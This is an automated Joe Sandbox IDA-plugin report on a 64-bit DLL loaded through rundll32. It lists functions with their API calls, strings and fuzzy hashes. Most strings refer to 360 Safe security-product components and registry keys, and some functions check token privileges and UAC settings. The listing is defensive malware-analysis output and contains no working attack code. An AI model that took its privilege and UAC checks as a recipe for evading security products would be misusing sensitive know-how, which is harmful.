memset.MSVCRT ref: 0000000180066519
RegQueryValueExW.ADVAPI32 ref: 0000000180066556
RegCloseKey.ADVAPI32 ref: 000000018006656C
PathAppendW.SHLWAPI ref: 000000018006657E
PathFileExistsW.SHLWAPI ref: 0000000180066589

Part of subcall function 0000000180065F9C: GetModuleHandleW.KERNEL32 ref: 0000000180065FBE
Part of subcall function 0000000180065F9C: memset.MSVCRT ref: 0000000180065FD4

GetProcAddress.KERNEL32 ref: 00000001800665AF
FreeLibrary.KERNEL32 ref: 00000001800665C3
FreeLibrary.KERNEL32 ref: 00000001800665D0
RegCloseKey.ADVAPI32 ref: 00000001800665DD

Strings

\entclient\EntSvcCall_x64.dll, xrefs: 0000000180066572
SOFTWARE\360Safe\360Ent, xrefs: 0000000180066467
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe, xrefs: 00000001800664F0
ServiceCall, xrefs: 00000001800664AF
Path, xrefs: 0000000180066547
Init, xrefs: 00000001800665A5

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Close$FreeLibraryOpenPathQueryValuememset$AddressAppendExistsFileHandleModuleProc
String ID: Init$Path$SOFTWARE\360Safe\360Ent$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe$ServiceCall$\entclient\EntSvcCall_x64.dll
API String ID: 1498439332-702965266
Opcode ID: 7287dc7089829755e66462901955348d5673694c8cc533bc2c05e2a633cd80c9
Instruction ID: 4281fb2f7f8363f35efb0fd70a638a071d20137889dcc292f685ea46b841f4e2
Opcode Fuzzy Hash: 7287dc7089829755e66462901955348d5673694c8cc533bc2c05e2a633cd80c9
Instruction Fuzzy Hash: 74513E32614B4996EF918F20E8557DA73A0F7897C4F549116BA9F06A79EF38C74CCB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180024CD4 Relevance: 32.0, APIs: 6, Strings: 12, Instructions: 490COMMON

Download Yara Rule

APIs

wcsstr.MSVCRT ref: 0000000180024D2B
PathFindExtensionW.SHLWAPI ref: 0000000180024D45
wcsstr.MSVCRT ref: 0000000180024D81
_wcsicmp.MSVCRT ref: 0000000180024DBC
wcschr.MSVCRT ref: 0000000180025254
_wtoi.MSVCRT ref: 0000000180025266

Strings

ShellExecute, xrefs: 000000018002568D
\\?\, xrefs: 0000000180025ABC
Server, xrefs: 00000001800255AD, 00000001800255CC
LocalServer32, xrefs: 0000000180025573, 0000000180025592
InprocServer, xrefs: 0000000180025950, 000000018002596F
gfffffff, xrefs: 0000000180025519
LocalServer, xrefs: 0000000180025539, 0000000180025558
CLSID, xrefs: 0000000180025490
InprocHandler, xrefs: 00000001800259C4, 00000001800259E3
gfffffff, xrefs: 0000000180025A39
InprocServer32, xrefs: 000000018002598A, 00000001800259A9
InprocHandler32, xrefs: 00000001800259FE, 0000000180025A1D

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: wcsstr$ExtensionFindPath_wcsicmp_wtoiwcschr
String ID: CLSID$InprocHandler$InprocHandler32$InprocServer$InprocServer32$LocalServer$LocalServer32$Server$ShellExecute$\\?\$gfffffff$gfffffff
API String ID: 3861457700-2318594275
Opcode ID: 1a717cbbda8cc80c3c9297c878bbbc669d8a73a80a9fe28ac877bfe538569426
Instruction ID: f5eaf3cd70d8a4233fc3eb4f5baabc932733307175318797ea3a634ab2d80fd0
Opcode Fuzzy Hash: 1a717cbbda8cc80c3c9297c878bbbc669d8a73a80a9fe28ac877bfe538569426
Instruction Fuzzy Hash: 3A12B672301A4886EB92DF39C8407DD23A1FB85BE5F44D211EA6D576E9EF78CA48C704

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180017114 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 278sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000180017179
GetTickCount.KERNEL32 ref: 0000000180017189
Sleep.KERNEL32 ref: 000000018001719B

Strings

CreateObject, xrefs: 0000000180017469
..\deepscan\cloudcom264.dll, xrefs: 0000000180017307
..\cloudcom264.dll, xrefs: 0000000180017352
..\, xrefs: 00000001800173CF

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CountTick$Sleep
String ID: ..\$..\cloudcom264.dll$..\deepscan\cloudcom264.dll$CreateObject
API String ID: 4250438611-3269604003
Opcode ID: b26729f86dd87614dde1f224353b88e55a5d4336fc5642cbf555589fae585a1a
Instruction ID: 779814ae67fce754565a54a050c1806dc9f81f57e114568d0bd2b2f20499cc86
Opcode Fuzzy Hash: b26729f86dd87614dde1f224353b88e55a5d4336fc5642cbf555589fae585a1a
Instruction Fuzzy Hash: 0CC16D72301F4882EB969B29D84479D33B1F788BE4F458215FA2E437A5EF38CA49C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180056DE8 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 118COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,00000000), ref: 0000000180056E2B
_wcsicmp.MSVCRT ref: 0000000180056E62
_wcsicmp.MSVCRT ref: 0000000180056E79
memset.MSVCRT ref: 0000000180056E93
SHGetValueW.SHLWAPI ref: 0000000180056ECC
memset.MSVCRT ref: 0000000180056EF4
memset.MSVCRT ref: 0000000180056F1B

Part of subcall function 0000000180056534: memset.MSVCRT ref: 0000000180056572
Part of subcall function 0000000180056534: GetModuleFileNameW.KERNEL32 ref: 0000000180056589
Part of subcall function 0000000180056534: PathAppendW.SHLWAPI ref: 00000001800565AD
Part of subcall function 0000000180056534: _wcsicmp.MSVCRT ref: 00000001800565C8
Part of subcall function 0000000180056534: PathAppendW.SHLWAPI ref: 00000001800565DE

SHGetValueW.SHLWAPI ref: 0000000180056F5D
LeaveCriticalSection.KERNEL32 ref: 0000000180056F91

Strings

360ExtHost, xrefs: 0000000180056E58
SOFTWARE\Wow6432Node\360Safe\Coop, xrefs: 0000000180056F0A
SOFTWARE\Wow6432Node\360SD, xrefs: 0000000180056EBB
SOFTWARE\Wow6432Node\360EntSecurity, xrefs: 0000000180056F41
Partner, xrefs: 0000000180056F2F
SOFTWARE\Wow6432Node\360EDRSensor, xrefs: 0000000180056F38
pid, xrefs: 0000000180056EB4
PCInfo, xrefs: 0000000180056E6F
ipartner, xrefs: 0000000180056F03

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: memset$_wcsicmp$AppendCriticalPathSectionValue$EnterFileLeaveModuleName
String ID: 360ExtHost$PCInfo$Partner$SOFTWARE\Wow6432Node\360EDRSensor$SOFTWARE\Wow6432Node\360EntSecurity$SOFTWARE\Wow6432Node\360SD$SOFTWARE\Wow6432Node\360Safe\Coop$ipartner$pid
API String ID: 3226263223-3142758636
Opcode ID: 628566989c82da212381fb3148179b37bd681cc2eaf5be604a1b5c7982e4b541
Instruction ID: 9533c192c26b347b8b9675f8c4be5ba0e6f9fe9a3a5b632a6bc0f6ba07ebb3e1
Opcode Fuzzy Hash: 628566989c82da212381fb3148179b37bd681cc2eaf5be604a1b5c7982e4b541
Instruction Fuzzy Hash: CF419D31A00A0C94FB96DB22A8403D963A4F74DBE4F909225FD28677A5EF39C74EC340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180044F64 Relevance: 30.1, APIs: 9, Strings: 8, Instructions: 320COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

_cwprintf_s_l.LIBCMT ref: 00000001800450AA
_cwprintf_s_l.LIBCMT ref: 00000001800450C2
_cwprintf_s_l.LIBCMT ref: 00000001800450D8

Part of subcall function 0000000180017B44: memset.MSVCRT ref: 0000000180017B79
Part of subcall function 0000000180017B44: memset.MSVCRT ref: 0000000180017BCB
Part of subcall function 0000000180017B44: InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,?,?,?,0000000180006327), ref: 0000000180017BD6
Part of subcall function 0000000180017B44: GetLastError.KERNEL32(?,?,?,?,?,?,0000000180006327), ref: 0000000180017BE0
Part of subcall function 0000000180017B44: GetTickCount.KERNEL32 ref: 0000000180017BF8

Part of subcall function 000000018000D19C: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000D22A
Part of subcall function 000000018000D19C: memset.MSVCRT ref: 000000018000D270
Part of subcall function 000000018000D19C: memmove.MSVCRT ref: 000000018000D282
Part of subcall function 000000018000D19C: ??3@YAXPEAX@Z.MSVCRT ref: 000000018000D2B8

memmove.MSVCRT ref: 000000018004518F
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800451AE
??3@YAXPEAX@Z.MSVCRT ref: 00000001800451EB
GetTickCount.KERNEL32 ref: 0000000180045357
srand.MSVCRT ref: 000000018004535F
rand.MSVCRT ref: 0000000180045365

Strings

router:1, xrefs: 000000018004506E
DomainQuery, xrefs: 00000001800450AF
0=%s, xrefs: 00000001800450CC
[%s], xrefs: 0000000180045051, 00000001800450B6
360safe, xrefs: 0000000180045086
com, xrefs: 000000018004504A
router, xrefs: 000000018004507A
mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%s, xrefs: 000000018004509E

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Count_cwprintf_s_lmemset$??3@Tickmemmove$??2@CriticalErrorHeapInitializeLastProcessSectionSpinrandsrand
String ID: 0=%s$360safe$DomainQuery$[%s]$com$mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%s$router$router:1
API String ID: 1789426470-3446598425
Opcode ID: 61786b1980ef7039dc4211af90e47e9a0e74f34993d56612bf85e9d061f4368c
Instruction ID: 6d6f9855de1d8c5247af129e1c82467daf937bd8777ee679c9f2b2c93b700a4d
Opcode Fuzzy Hash: 61786b1980ef7039dc4211af90e47e9a0e74f34993d56612bf85e9d061f4368c
Instruction Fuzzy Hash: D8D19132204F4882EB419B69D8803DE73A0F789BE5F108226BAAD477E5DF78C649C704

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004C034 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 000000018004C074
OpenProcessToken.ADVAPI32 ref: 000000018004C085
GetTokenInformation.ADVAPI32 ref: 000000018004C0B8
GetLastError.KERNEL32 ref: 000000018004C0C8
GlobalAlloc.KERNEL32 ref: 000000018004C0E3
GetTokenInformation.ADVAPI32 ref: 000000018004C115
LookupAccountSidW.ADVAPI32 ref: 000000018004C156
CloseHandle.KERNEL32 ref: 000000018004C175
GlobalFree.KERNEL32 ref: 000000018004C183
wcscmp.MSVCRT ref: 000000018004C19D
wcscmp.MSVCRT ref: 000000018004C1B4
wcscmp.MSVCRT ref: 000000018004C1CB
wcscmp.MSVCRT ref: 000000018004C1E2

Strings

SYSTEM, xrefs: 000000018004C1A6
NETWORK SERVICE, xrefs: 000000018004C1D4
LOCAL SERVICE, xrefs: 000000018004C1BD
NT AUTHORITY, xrefs: 000000018004C193

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: wcscmp$Token$GlobalInformationProcess$AccountAllocCloseCurrentErrorFreeHandleLastLookupOpen
String ID: LOCAL SERVICE$NETWORK SERVICE$NT AUTHORITY$SYSTEM
API String ID: 3141378966-199577007
Opcode ID: 8d6976f719ecb46038f7faa6d62441ad30095ab4bbf55d005c38fee77e3359ad
Instruction ID: cee3605f7c7adaec53412b2e982fb153fefebb873c81ca2b5be3308eddbb09f0
Opcode Fuzzy Hash: 8d6976f719ecb46038f7faa6d62441ad30095ab4bbf55d005c38fee77e3359ad
Instruction Fuzzy Hash: F2517C32604B4986EBE28F14E8847DA73A5F78D7D8F518125EA5D436A4DF39C70DCB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003AC1C Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 107COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018003AC67
GetModuleHandleW.KERNEL32 ref: 000000018003AC73
GetModuleFileNameW.KERNEL32 ref: 000000018003AC8E
memset.MSVCRT ref: 000000018003ACAE
GetModuleFileNameW.KERNEL32 ref: 000000018003ACC4
PathAppendW.SHLWAPI ref: 000000018003ACEA
PathAppendW.SHLWAPI ref: 000000018003ACFC
GetFileAttributesW.KERNEL32 ref: 000000018003AD07
PathAppendW.SHLWAPI ref: 000000018003AD36
PathAppendW.SHLWAPI ref: 000000018003AD48

Strings

..\deepscan\, xrefs: 000000018003ACDE
bapi64.dll, xrefs: 000000018003AC6C, 000000018003ACF0, 000000018003AD3C
..\, xrefs: 000000018003AD2A

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AppendPath$FileModule$Namememset$AttributesHandle
String ID: ..\$..\deepscan\$bapi64.dll
API String ID: 2144934147-2390674060
Opcode ID: 9d5beebac642680a506550c8be48c190e39914ceb82cb04c52bb84f1375e2870
Instruction ID: 18b05e09174244348b6cef7f8f2b1baf28e5037f203e247325d4c6a64b139c1b
Opcode Fuzzy Hash: 9d5beebac642680a506550c8be48c190e39914ceb82cb04c52bb84f1375e2870
Instruction Fuzzy Hash: 6F514B32614A8882FBA3DB20EC443DA3361F78D7C9F859125E59A47AA5EF2DC74DC740

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004872C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 318COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

_cwprintf_s_l.LIBCMT ref: 0000000180048845
_cwprintf_s_l.LIBCMT ref: 000000018004885A
IsBadStringPtrW.KERNEL32 ref: 0000000180048873
_cwprintf_s_l.LIBCMT ref: 000000018004888F
memmove.MSVCRT ref: 0000000180048946
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800489B5
??3@YAXPEAX@Z.MSVCRT ref: 00000001800489F2
GetTickCount.KERNEL32 ref: 0000000180048B0C
srand.MSVCRT ref: 0000000180048B14
rand.MSVCRT ref: 0000000180048B1A

Strings

%d=%s, xrefs: 0000000180048883
[%s], xrefs: 00000001800487EE, 000000018004884E
com, xrefs: 00000001800487E7
mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%spid=%s, xrefs: 0000000180048839

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _cwprintf_s_l$??3@CountHeapProcessStringTickmemmoverandsrand
String ID: %d=%s$[%s]$com$mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%spid=%s
API String ID: 2740332460-2247268028
Opcode ID: 48d86df3b5eac7e439a35ff4fd84f198e4b1e974b1358ce155bcc0297089f372
Instruction ID: 80426b886386f52412969e15ba132e6e65bce95777886caa6ce0aa64614bcf94
Opcode Fuzzy Hash: 48d86df3b5eac7e439a35ff4fd84f198e4b1e974b1358ce155bcc0297089f372
Instruction Fuzzy Hash: 5FD1C172305F4886EB51DB29E88039E73A0FB88BE8F158625AE5D077A5DF78C549C704

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004F018 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 116COMMON

Download Yara Rule

APIs

wcsstr.MSVCRT ref: 000000018004F06D
_wcsicmp.MSVCRT ref: 000000018004F102
_wcsnicmp.MSVCRT ref: 000000018004F11C
_wcsicmp.MSVCRT ref: 000000018004F14D
_wcsnicmp.MSVCRT ref: 000000018004F167
_wcsicmp.MSVCRT ref: 000000018004F17B
_wcsnicmp.MSVCRT ref: 000000018004F195

Strings

Wow6432Node, xrefs: 000000018004F0F8
Software\Classes\Wow6432Node, xrefs: 000000018004F143
Software\Classes\Wow6432Node\, xrefs: 000000018004F15D
Wow6432Node\, xrefs: 000000018004F112
Software\Wow6432Node, xrefs: 000000018004F171
Software\Wow6432Node\, xrefs: 000000018004F18B
wow6432node, xrefs: 000000018004F066

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _wcsicmp_wcsnicmp$wcsstr
String ID: Software\Classes\Wow6432Node$Software\Classes\Wow6432Node\$Software\Wow6432Node$Software\Wow6432Node\$Wow6432Node$Wow6432Node\$wow6432node
API String ID: 4199785700-2224805171
Opcode ID: bc25291bcc814f054e7e10840494f54f48fde9230fe93c8f0d5c0c6b2b3ad0be
Instruction ID: 173969ce7e51924b4f06bf421c606f91b3afd6de77e358442d966ae2f37bd097
Opcode Fuzzy Hash: bc25291bcc814f054e7e10840494f54f48fde9230fe93c8f0d5c0c6b2b3ad0be
Instruction Fuzzy Hash: 55517371710E48C1EBA6DB29D8843B923A1B789BE4F46C215EA39437E4DF68CB4CC745

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180014138 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018001417F
GetModuleFileNameW.KERNEL32 ref: 0000000180014196
PathAppendW.SHLWAPI ref: 00000001800141A8

Part of subcall function 0000000180065EE4: PathFileExistsW.SHLWAPI ref: 0000000180065F00
Part of subcall function 0000000180065EE4: EnterCriticalSection.KERNEL32 ref: 0000000180065F2A
Part of subcall function 0000000180065EE4: LeaveCriticalSection.KERNEL32 ref: 0000000180065F73

memset.MSVCRT ref: 00000001800141E1
GetModuleFileNameW.KERNEL32 ref: 00000001800141F8
PathAppendW.SHLWAPI ref: 000000018001420A
PathFileExistsW.SHLWAPI ref: 0000000180014215
memset.MSVCRT ref: 0000000180014229
GetModuleFileNameW.KERNEL32 ref: 0000000180014240
PathAppendW.SHLWAPI ref: 0000000180014252
PathFileExistsW.SHLWAPI ref: 000000018001425D

Strings

..\safemon\360Cactus.tpi, xrefs: 000000018001419C
..\360SkinMgr.exe, xrefs: 0000000180014246
..\360sd.exe, xrefs: 00000001800141FE

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: FilePath$AppendExistsModuleNamememset$CriticalSection$EnterLeave
String ID: ..\360SkinMgr.exe$..\360sd.exe$..\safemon\360Cactus.tpi
API String ID: 2738204422-1657815065
Opcode ID: 78597d9bd975c32090d8355579ef8ffe821f8875940c9f43dd2c1350df723c28
Instruction ID: 05d3995d6e5afe1b7f2ff7eb98ba3dbe6d41cc5d548c72c66593806649a32fef
Opcode Fuzzy Hash: 78597d9bd975c32090d8355579ef8ffe821f8875940c9f43dd2c1350df723c28
Instruction Fuzzy Hash: 0E417131614A8D82EBE69B21EC953EA27A4F79D784F80C055F99E476A5DF2DC30DCB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800495A4 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00000001800495AC
srand.MSVCRT ref: 00000001800495B4
GetCurrentProcessId.KERNEL32 ref: 00000001800495BA

Part of subcall function 0000000180049050: GetCurrentProcessId.KERNEL32 ref: 0000000180049077
Part of subcall function 0000000180049050: GetCurrentProcess.KERNEL32 ref: 0000000180049085
Part of subcall function 0000000180049050: OpenProcessToken.ADVAPI32 ref: 000000018004909B
Part of subcall function 0000000180049050: LookupPrivilegeValueW.ADVAPI32 ref: 00000001800490B4
Part of subcall function 0000000180049050: SetLastError.KERNEL32 ref: 00000001800490DA
Part of subcall function 0000000180049050: AdjustTokenPrivileges.ADVAPI32 ref: 00000001800490FA
Part of subcall function 0000000180049050: GetLastError.KERNEL32 ref: 0000000180049104
Part of subcall function 0000000180049050: CloseHandle.KERNEL32 ref: 0000000180049117
Part of subcall function 0000000180049050: CloseHandle.KERNEL32 ref: 0000000180049120

GetCurrentProcessId.KERNEL32 ref: 00000001800495CE

Part of subcall function 0000000180049050: OpenProcess.KERNEL32 ref: 000000018004914F

??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800495FA
GetTokenInformation.ADVAPI32 ref: 0000000180049629
GetSidSubAuthorityCount.ADVAPI32 ref: 0000000180049636
GetLastError.KERNEL32 ref: 000000018004963F
GetSidSubAuthority.ADVAPI32 ref: 0000000180049658
??_V@YAXPEAX@Z.MSVCRT ref: 000000018004967B

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00000001800496B1
EnableLUA, xrefs: 00000001800496A5
SeIncreaseQuotaPrivilege, xrefs: 00000001800495D6
SeAssignPrimaryTokenPrivilege, xrefs: 00000001800495C2

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Process$Current$ErrorLastToken$AuthorityCloseCountHandleOpen$AdjustInformationLookupPrivilegePrivilegesTickValuesrand
String ID: EnableLUA$SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege$Software\Microsoft\Windows\CurrentVersion\Policies\System
API String ID: 3925562141-265463531
Opcode ID: a57da0144c8b3ec11c0e522ef8c430139a10120594fc322029b2c4e2061fd0c9
Instruction ID: 18e523dacad9dbff7da835527a40f6400bbabc6d4a0801b70a32ec311d970068
Opcode Fuzzy Hash: a57da0144c8b3ec11c0e522ef8c430139a10120594fc322029b2c4e2061fd0c9
Instruction Fuzzy Hash: D9313071606B0896EB969B64E8843D963A1BB4CBC5F46C125F94A123A5EF38CB4CCB44

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004C3C8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 187COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018004C433
GetModuleFileNameW.KERNEL32 ref: 000000018004C44D
PathAppendW.SHLWAPI ref: 000000018004C462

Strings

..\360bps.dat, xrefs: 000000018004C453
//lsp/fnpw, xrefs: 000000018004C685
//lsp/fnp, xrefs: 000000018004C66D

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

